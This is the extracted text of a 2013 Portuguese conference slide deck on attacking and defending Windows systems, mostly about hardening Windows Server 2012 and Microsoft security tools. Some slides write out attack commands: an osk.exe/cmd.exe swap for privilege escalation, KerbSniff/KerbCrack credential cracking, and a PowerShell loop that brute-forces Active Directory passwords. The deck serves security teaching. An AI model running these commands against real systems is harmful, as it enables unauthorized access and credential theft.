hacking windows systems -...
TRANSCRIPT
1
DANIEL DONDA
MVP Windows Expert-IT Pro
MCP,MCT,MCITP-EA, MCSA+Security, MCSE+Security, MCSE+Messaging
EC-CEH V8 | EC-CEIwww.mcsesolution.com | www.infosecbrasil.orgtwitter: @danieldonda
http://mvp.microsoft.com/pt-br/
Hacking Windows SystemsAtaques e Defesas
Hacking Day 2013
Princípios de segurança e
novidades do Windows Server 2012
Agenda
• Apresentação
• Segurança e Microsoft – Uma analise através do tempo
• Porque é fácil atacar o Windows ?
• O Windows sem Windows (Reduzindo a superfície de ataque)
• Hardening Windows Server 2012
• Kerbsniff, KerbCrack e o Kerberos Armoring
• 10 importantes recursos e dicas MSFT
2
Metas para a sessão de hoje
3
Princípios de segurança e novidades
Segurança e Microsoft – Uma
analise através do tempo
• 1975–1981: Microsoft inicia.
• 1981 – MS-DOS
• 1982–1985: Windows 1.0
• 1987–1992: Windows 2.0–2.11
• 1990–1994: Windows 3.0–Windows NT
• 1995–2001: Windows 95
• 1998–2000: Windows 98, Windows 2000, Windows Me - Internet
• 2001–2005: Windows XP - Consciência de vírus de computador e hackers
• 2006–2008: Windows Vista – 1,5 milhões de dispositivos são compatíveis
• 2009: Windows 7 - 8 Milhões de beta-testers no mundo
• 2012: Windows 8 – Recursos avançados de segurança
5
Windows History
Porque é fácil atacar o
Windows ?
6
Atacando o Windows
7
1 – Usuário / Admin (60.000.000)
2 – Softwares desnecessários
3 – Configuração Incorreta
4 – Softwares desatualizados
5 – OS desatualizado
5 – Falta de conhecimento
8
CD\Windows\System32\
COPY OSK.EXE OSK.OLD2
takeown /F osk.exe
cacls osk.exe /G Administrator:F /E
COPY CMD.EXE OSK.EXE
1 - Elevação de privilégio
http://ntsecurity.nu/toolbox/kerbcrack/
Kerbsniff kerbs.txt
KerbCrack kerbs.txt –d kgodoi
RFC 6113 - Flexible Authentication Secure Tunnel (FAST)
2 - Kerberos Atack vs Kerberos Armoring
10
01001010110111011101010111011101011011
net use x: \\servidor\dados
x:
type senhas.txt
Servidor
3- Proteção de acesso a dados – SMB 3.0
SMB 3 utiliza um novo algoritmo para assinatura - AES-CMAC em vez do HMAC-SHA256
usado por SMB 2.
• Dynamic Access Control
11
• Controlar quem pode acessar informação e auditar quem teve
acesso a informação.
• Classificar arquivos para toda a corporação.
•
Auditar o acesso a arquivos usando as diretivas de auditoria centrais para
• geração de relatórios de conformidade e análise forense.
• Aplicar proteção Rights Management Services (RMS)
Proteção de acesso a dados - DAC
Reduzindo a superfície de
ataque
O Windows sem Windows
12
Windows Server Core
13
Menos uso de recursos
Menos serviços e recursos
Menos reboot
Redução de Updates em até 70%
Menos superfície de ataque
Recursos do Server Core
14
Active Directory Certificate Services
Active Directory Domain Services
DHCP Server
DNS Server
File Services (including File Server Resource Manager)
Active Directory Lightweight Directory Services (AD LDS)
Hyper-V
Print and Document Services
Streaming Media Services
Web Server (including a subset of ASP.NET)
Windows Server Update Server
Active Directory Rights Management Server
Routing and Remote Access Server
Opções do Server CoreOpção de instalação do Server Core Interface Mínima do Servidor Opção de instalação Servidor com GUI Recurso Experiência Desktop instalado
Prompt de comando disponível disponível disponível disponível
Windows PowerShell / Windows
.NET
disponíveis disponíveis disponíveis disponíveis
Gerenciador do Servidor não disponível disponível disponível disponível
Console de Gerenciamento
Microsoft
não disponível disponível disponível disponível
Painel de Controle não disponível não disponível disponível disponível
Miniaplicativos do Painel de
Controle
não disponíveis alguns disponíveis disponíveis disponíveis
Windows Explorer não disponível não disponível disponível disponível
Barra de tarefas não disponível não disponível disponível disponível
Área de notificação não disponível não disponível disponível disponível
Internet Explorer não disponível não disponível disponível disponível
Sistema de ajuda integrado não disponível não disponível disponível disponível
Temas não disponíveis não disponíveis não disponíveis disponíveis
tela Iniciar estilo Metro não disponível não disponível não disponível disponível
Aplicativos estilo Metro não disponíveis não disponíveis não disponíveis disponíveis
Windows Media Player não disponível não disponível não disponível disponível15
Serv
er-
Gu
i-M
gm
t-In
fra
Serv
er-
Gu
i-M
gm
t-In
fra, Serv
er-
Gu
i-Sh
ell
Serv
er-
Gu
i-M
gm
t-In
fra, Serv
er-
Gu
i-Sh
ell, D
esk
top
-Exp
eri
en
ce
O que é o Microsoft Hyper-V Server?
16
Microsoft hypervisor
• Command Line Interface
• Não possui licença de SO
• Standalone Hyper-V
• Download gratuito do ISO
• Gerenciamento Remoto
Hardening Windows Server
2012
17
Features on Demand
• PowerShell
• DISM
18
Security Configuration Wizard
19
Password Settings Object
20
10 importantes recursos e dicas
da MSFT
21
1-Microsoft Security Intelligence Report
O Microsoft Security Intelligence Report (SIR) é um relatório
trimestral sobre vulnerabilidades de software, exploração de
vulnerabilidades de software e softwares maliciosos e
potencialmente indesejados.
22
www.microsoft.com/sir
2 - Microsoft Security Response Center
• O Microsoft Security Response Center (MSRC) identifica,
monitora, resolve, e responde a incidentes de segurança e
vulnerabilidades de segurança de software Microsoft.
• Estamos em 24 horas de alerta de segurança todos os dias,
grupos de notícias de segurança, monitorar e responder a
mais de 100.000 e-mails de clientes anualmente enviados
para [email protected].
http://www.microsoft.com/security/msrc/default.aspx23
3 - Microsoft Security Compliance Manager
• O SCM é uma ferramenta gratuita da Microsoft que permite
configurar rapidamente e gerenciar os computadores em seu
ambiente com Diretiva de Grupo e Microsoft System Center
Configuration Manager.
• SCM fornece prontos para implantar políticas e pacotes de
configuração baseadas em recomendações da guia de segurança e
melhores práticas da indústria, permitindo que você gerencie
facilmente configurações e requisitos de conformidade para os
sistemas operacionais Windows.
24
http://technet.microsoft.com/en-us/library/cc677002.aspx
4 – Proteção com criptografia
• BitLocker e Bitlocker to go
• BitLocker utiliza o Advanced Encryption Standard, com 128-bit e 256-bit
comprimentos de chave.
• EFS (Encrypting File System)
• Criptografia de arquivos usando algoritmos RSA
ou ECC
25
5 - Freeware Microsoft Tools
• AccessChk- Essa ferramenta mostra a você os acessos de usuário ou de grupo a arquivos, a chaves do Registro ou serviços
AccessEnum - Essa ferramenta de segurança simples, mostra a você quem tem que tipo de acesso a diretórios.
• Sigcheck - informações sobre a versão do arquivo e verifique se as imagens em seu sistema estão assinadas digitalmente.
• ShareEnum - Verifique compartilhamentos de arquivos e exiba suas configurações de segurança
• SDelete - Substitua com segurança seus arquivos confidenciais e libere espaço livre de arquivos excluídos.
• Account Lockout and Management Tools – Uso muito, principalmente o acctinfo.dll para exibir outros atributos no AD.
• PortQry Command Line Port Scanner Analise de estado das portas TCP e UDP
• Port Reporter – Quais portas que são usadas, qual o processo está usando a porta, se o processo é um serviço
• Port Reporter Parser Tool - Analisador de log para arquivos de log Port Reporter.
• Promqry and PromqryUI Detecta Sniffers Promiscuos
• PromqryUI Interface grafica para promqey.
• Promqry linha de comando para detecção de sniffers no modo promiscuous.
• Windows SteadyState – Não importa o que aconteça – Vírus, Malware – você pode voltar o seu Windows ao normal
26
http://www.mcsesolution.com/Mcsesolution/lista-de-softwares-freeware-
microsoft-tools.html
6 - Windows 8 contra Malware
Windows 8 inclui as seguintes tecnologias novas e avançadas
que proporcionam melhor defesa contra malware:
• Action Center
• Secure Boot
• User Account Control (UAC)
• Biometric Security
• Windows Defender
• Malicious Software Removal Tool
• Windows Firewall
27
7 - O Windows To Go
• O Windows To Go é uma imagem de boot do Windows 8 em
um drive USB que um usuário pode iniciar em outro
computador. Windows to go fornece aos usuários uma cópia
portátil de um computador Windows corporativo para
fornecer uma experiência de usuário consistente em certos
tipos de hotdesk ou remotos cenários de trabalho.
28
8 - PowerShell
• ~2,430 cmdlets
dsquery user -limit 0 > users
foreach ($FDN in Get-Content .\users
{
$results =dsget user $FDN -samid
$samid = $results[1].replace (" ","")
Write-host $samid
foreach ($password in Get-Content .\password.txt
{
$password = $password.replace(" "."")
dsget user $FDN -u $samid -p $password > $null
if ($?) {
Write-host "Conta: $samid Senha: $password"
}
}
}
29
http://bit.ly/WinPS-Ebook
9 - Newsletter de Segurança
• Dicas de segurança
• Notícias da comunidade e outras informações de segurança relevantes
• Biografias dos MVPs (Profissionais Mais Valiosos) de segurança
• Guias, recursos e práticas recomendadas de segurança
• Blogs, fóruns, grupos de notícias e sites de segurança
• Informações sobre o ciclo de vida dos produtos da Microsoft
• Boletins e atualizações de segurança
• Editoriais de executivos e especialistas em segurança da Microsoft
• Webcasts e chats
• Eventos sobre segurança online e presenciais
• Laboratórios práticos de segurança da Microsoft
30
http://technet.microsoft.com/pt-br/security/
10 - Microsoft Security on Twitter
· @Safer_Online, http://twitter.com/Safer_Online
· @MSFTSecResponse, http://twitter.com/msftsecresponse
· @MSFTSecurity, http://twitter.com!/msftsecurity
· @MSFTmmpc, http://twitter.com/msftmmpc
· @MicrosoftDCU, http://twitter.com!/MicrosoftDCU
• Microsoft Security on Facebook
• · MMPC - http://www.facebook.com/#!/msftmmpc
31
Thank you for your time and attention!
http://facebook.com/mcsesolution
@danieldonda
32
Thank You!